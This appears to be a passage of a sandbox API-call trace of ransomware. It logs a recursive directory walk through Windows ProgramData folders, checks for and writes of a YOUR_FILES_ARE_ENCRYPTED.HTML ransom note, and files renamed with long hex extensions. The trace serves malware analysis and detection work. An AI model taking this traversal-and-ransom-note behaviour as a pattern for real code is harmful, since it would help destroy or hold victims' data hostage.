cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.887] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.887] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.887] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.887] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.887] GetProcessHeap () returned 0x270000 [0169.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.888] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, 
ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.888] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.888] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.888] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.888] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.888] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\ehome\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.888] GetProcessHeap () returned 0x270000 [0169.889] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.889] 
FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0169.889] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 44 [0169.889] GetProcessHeap () returned 0x270000 [0169.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.889] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0169.889] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*" [0169.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.889] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.889] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xcbbd8260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D", cAlternateFileName="PPCRLC~1.33A")) returned 1 [0169.889] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned 125 [0169.889] lstrcmpW (lpString1="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.889] PathFindExtensionW (pszPath="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" [0169.890] lstrlenW (lpString=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned 65 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, 
ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C", cAlternateFileName="")) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned 121 [0169.890] lstrcmpW (lpString1="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.890] PathFindExtensionW (pszPath="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" [0169.890] lstrlenW (lpString=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned 65 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd8260, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbbd8260, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc24520, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.890] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd8260, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbbd8260, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc24520, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.890] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.890] GetProcessHeap () returned 0x270000 [0169.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.891] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0169.891] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned 45 
[0169.891] GetProcessHeap () returned 0x270000 [0169.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.891] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player" [0169.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*" [0169.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.891] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.891] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.896] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.896] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.896] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.896] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.896] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.896] GetProcessHeap () returned 0x270000 [0169.897] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.897] FindNextFileW (in: 
hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MF", cAlternateFileName="")) returned 1 [0169.897] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned 35 [0169.897] GetProcessHeap () returned 0x270000 [0169.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.897] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" [0169.897] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*" [0169.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, 
ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned 46 [0169.898] lstrcmpW (lpString1="Active.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.898] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0169.898] lstrlenW (lpString=".GRL") returned 4 [0169.898] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned 47 [0169.898] lstrcmpW (lpString1="Pending.GRL", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.898] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0169.898] lstrlenW (lpString=".GRL") returned 4 [0169.898] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0169.898] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.898] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0169.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.899] GetProcessHeap () returned 0x270000 [0169.899] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.899] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0169.899] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned 45 [0169.899] GetProcessHeap () returned 0x270000 [0169.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.900] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" [0169.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*" [0169.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, 
